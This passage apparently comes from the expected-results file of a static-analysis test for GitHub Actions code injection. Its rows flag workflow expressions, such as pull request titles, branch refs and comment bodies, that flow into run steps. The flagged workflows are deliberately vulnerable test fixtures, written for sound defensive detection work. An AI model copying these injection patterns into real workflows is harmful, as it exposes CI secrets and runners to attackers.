controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | .github/workflows/simple2.yml:3:6:3:24 | pull_request_target | pull_request_target | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | .github/workflows/slash_command2.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | .github/workflows/test1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test3.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | .github/workflows/test5.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | ${{ needs.get-artifacts.outputs.ref }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | .github/workflows/test12.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test18.yml:2:3:2:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | 